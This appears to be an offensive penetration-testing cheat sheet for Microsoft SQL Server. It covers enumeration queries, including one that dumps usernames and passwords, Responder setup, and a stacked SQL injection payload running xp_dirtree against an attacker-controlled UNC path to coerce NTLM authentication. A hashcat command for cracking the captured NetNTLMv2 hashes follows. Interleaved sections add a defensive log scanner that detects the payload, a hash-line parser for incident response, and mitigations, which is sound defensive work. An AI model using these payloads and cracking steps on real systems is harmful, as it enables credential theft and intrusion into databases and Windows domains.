DB Information

Current Database User
    SELECT USER_NAME();

Current Database
    SELECT DB_NAME();

Databases
    SELECT name FROM sys.databases;

Tables
    SELECT name FROM <DATABASE>.sys.tables;
    SELECT table_name FROM <DATABASE>.information_schema.tables;

Columns
    SELECT column_name FROM <DATABASE>.information_schema.columns WHERE table_name='<TABLE>';

Data
    SELECT <COLUMN> FROM <DATABASE>.<SCHEMA>.<TABLE>;
    e.g.
    SELECT username, password FROM streamio_backup.dbo.users;

Privileges and Roles
    SELECT IS_SRVROLEMEMBER('sysadmin');

Read Files 🛠️⌛
    System
    Web Application

Write Files 🛠️⌛

Command Execution
NTLM Capture / Relay Primitives

NTLM Capture
See NTLM Capture

Setting up the SMB Server
From the attacker ⚔️

Setup (!$ expands to the last argument of the previous command)
    git clone https://github.com/lgandx/Responder Responder
    cd !$ && python3 -m venv .venv
    . !$/bin/activate && pip3 install -r requirements.txt

Usage
    python3 Responder.py --interface '<NET_IFACE>'

Forcing SMB Authentication
From the Webapp 🎯
    q=' AND 1=1 ; use master ; exec xp_dirtree '\\<ATTACKER_IP>\<SHARE>' -- -
    e.g.
    q=' AND 1=1 ; use master ; exec xp_dirtree '\\10.10.10.15\smbFolder' -- -
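Detection for the coercion above, seen from the defender's side. This is an added example, not code from the original page: it scans web-server access-log lines for a stacked `xp_dirtree` call that carries a UNC path, which is the signature of the payload shown, while leaving a plain mention of the procedure name alone. The log format, the `q` parameter, the client addresses and the log lines themselves are constructed for the example.

```python
import re
from dataclasses import dataclass
from typing import Optional
from urllib.parse import parse_qsl, urlsplit

# Constructed sample access-log lines (not from the original page). Line 2 carries
# the page's xp_dirtree payload URL-encoded in the q parameter; line 3 merely
# mentions the procedure name in a benign parameter and must not be flagged.
SAMPLE_LOG = """\
10.0.0.7 - - [12/May/2024:10:01:02 +0000] "GET /search?q=laptop HTTP/1.1" 200 512
10.0.0.9 - - [12/May/2024:10:01:05 +0000] "GET /search?q=%27%20AND%201%3D1%20%3B%20use%20master%20%3B%20exec%20xp_dirtree%20%27%5C%5C10.10.10.15%5CsmbFolder%27%20--%20- HTTP/1.1" 500 0
10.0.0.3 - - [12/May/2024:10:02:00 +0000] "GET /help?topic=xp_dirtree HTTP/1.1" 200 2048
10.0.0.3 - - [12/May/2024:10:02:30 +0000] "POST /login HTTP/1.1" 302 0
"""

# Common-log-format request line: client address and the request target.
LOG_RE = re.compile(
    r'^(?P<client>\S+) \S+ \S+ \[[^\]]+\] "(?P<method>\S+) (?P<target>\S+) [^"]*"')

# A stacked-query call to xp_dirtree aimed at a UNC path (\\host\share). The quote
# or semicolon in front is what separates an injected statement from the bare word.
UNC_DIRTREE = re.compile(
    r"""(?ix)
    ['";]\s*                        # terminator of the original statement
    (?:use\s+master\s*;\s*)?        # optional 'use master ;' as in the page's payload
    (?:exec(?:ute)?\s+)?
    (?:master\.{1,2}(?:dbo\.)?)?    # optional master..xp_dirtree / master.dbo.xp_dirtree
    xp_dirtree\s+
    '\\\\(?P<host>[^\\']+)\\(?P<share>[^\\']*)
    """
)


@dataclass
class Finding:
    client: str
    param: str
    host: str
    share: str


def scan_line(line: str) -> Optional[Finding]:
    """Return a Finding if any query parameter carries an xp_dirtree UNC call."""
    m = LOG_RE.match(line)
    if not m:
        return None
    query = urlsplit(m["target"]).query
    # parse_qsl URL-decodes each value, so %27 / %3B / %5C become ' ; \ before matching.
    for name, value in parse_qsl(query, keep_blank_values=True):
        hit = UNC_DIRTREE.search(value)
        if hit:
            return Finding(m["client"], name, hit["host"], hit["share"])
    return None


def scan_log(text: str) -> list:
    """Scan a whole log and keep only the lines that matched."""
    return [f for f in map(scan_line, text.splitlines()) if f is not None]


if __name__ == "__main__":
    for f in scan_log(SAMPLE_LOG):
        print(f"{f.client} injected xp_dirtree via '{f.param}' toward \\\\{f.host}\\{f.share}")
```

The match is deliberately anchored on the statement terminator before the procedure name, so the `/help?topic=xp_dirtree` request is not reported. Flagging such lines is after-the-fact detection; the fixes are parameterised queries, so stacked statements never reach SQL Server, and an application login that is not allowed to execute `xp_dirtree` in the first place.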
Cracking NetNTLMv2 Response
From the attacker ⚔️
    hashcat --force -O --attack-mode 0 --hash-type 5600 <HASH_FILE> <WORDLIST>
    e.g.
    hashcat --force -O --attack-mode 0 --hash-type 5600 hash /usr/share/wordlists/rockyou.txt
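For incident response it helps to know what a line in the `<HASH_FILE>` above actually contains before anyone thinks about cracking it. The parser below is an added example, not code from the page or from hashcat: it splits a mode-5600 line (`USER::DOMAIN:SERVER_CHALLENGE:NTPROOFSTR:BLOB`) and decodes the blob, which is the NTLMv2_CLIENT_CHALLENGE structure from MS-NLMP: the client's timestamp, its 8-byte challenge, and the AvPair target info the SMB server advertised and the client echoed back. The capture line it runs on is constructed in `build_sample_line()`; the account `svc_sql`, the domain `CORP` and the `SMBSRV` names are invented for the example.

```python
import struct
from datetime import datetime, timedelta, timezone

# NTLMv2 AvPair ids (MS-NLMP 2.2.2.1); the string-valued ones are UTF-16LE.
AV_IDS = {1: "NbComputerName", 2: "NbDomainName", 3: "DnsComputerName",
          4: "DnsDomainName", 5: "DnsTreeName", 6: "Flags", 7: "Timestamp",
          8: "SingleHost", 9: "TargetName", 10: "ChannelBindings"}
AV_STRINGS = {1, 2, 3, 4, 5, 9}
FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def filetime_to_datetime(filetime: int) -> datetime:
    """FILETIME counts 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=filetime // 10)


def parse_av_pairs(data: bytes) -> dict:
    """Walk AvPairs (AvId, AvLen, Value) until the MsvAvEOL terminator."""
    pairs, pos = {}, 0
    while pos + 4 <= len(data):
        av_id, av_len = struct.unpack_from("<HH", data, pos)
        pos += 4
        if av_id == 0:
            break
        value = data[pos:pos + av_len]
        pos += av_len
        pairs[AV_IDS.get(av_id, f"AvId{av_id}")] = (
            value.decode("utf-16-le") if av_id in AV_STRINGS else value.hex())
    return pairs


def parse_netntlmv2_line(line: str) -> dict:
    """Split a hashcat mode-5600 line: USER::DOMAIN:SERVER_CHALLENGE:NTPROOFSTR:BLOB."""
    user, _, domain, server_challenge, nt_proof, blob_hex = line.strip().split(":", 5)
    blob = bytes.fromhex(blob_hex)
    # NTLMv2_CLIENT_CHALLENGE header: RespType, HiRespType, Reserved1, Reserved2,
    # TimeStamp (FILETIME), ChallengeFromClient, Reserved3; AvPairs start at offset 28.
    _resp, _hi, _r1, _r2, timestamp, client_challenge, _r3 = struct.unpack_from(
        "<BBHIQ8sI", blob, 0)
    return {
        "user": user,
        "domain": domain,
        "server_challenge": server_challenge,
        "nt_proof": nt_proof,
        "client_timestamp": filetime_to_datetime(timestamp),
        "client_challenge": client_challenge.hex(),
        "target_info": parse_av_pairs(blob[28:]),
    }


def _av(av_id: int, text: str) -> bytes:
    value = text.encode("utf-16-le")
    return struct.pack("<HH", av_id, len(value)) + value


def build_sample_line() -> str:
    """Constructed capture line (not a real hash): invented account svc_sql of CORP
    answering an SMB server that called itself SMBSRV, at 2024-05-12 10:01:07 UTC."""
    when = datetime(2024, 5, 12, 10, 1, 7, tzinfo=timezone.utc) - FILETIME_EPOCH
    filetime = (when.days * 86400 + when.seconds) * 10_000_000 + when.microseconds * 10
    blob = struct.pack("<BBHIQ8sI", 1, 1, 0, 0, filetime,
                       bytes.fromhex("0011223344556677"), 0)
    blob += _av(2, "CORP") + _av(1, "SMBSRV") + _av(4, "corp.local") + _av(3, "smbsrv.corp.local")
    blob += struct.pack("<HH", 0, 0) + b"\x00\x00\x00\x00"  # MsvAvEOL plus trailing pad
    return f"svc_sql::CORP:1122334455667788:{'ab' * 16}:{blob.hex()}"


if __name__ == "__main__":
    parsed = parse_netntlmv2_line(build_sample_line())
    print(f"{parsed['domain']}\\{parsed['user']} authenticated to "
          f"{parsed['target_info'].get('DnsComputerName')} at {parsed['client_timestamp'].isoformat()}")
```

The user and domain fields are the part a responder acts on: with `xp_dirtree` the authenticating identity is the SQL Server service account, so that is the credential to rotate, and the privileges granted to it bound what a cracked or relayed response is worth. The client timestamp dates the coercion, which is useful when correlating with the web logs. Blocking outbound SMB (TCP 445) from database hosts prevents the response from leaving the network at all.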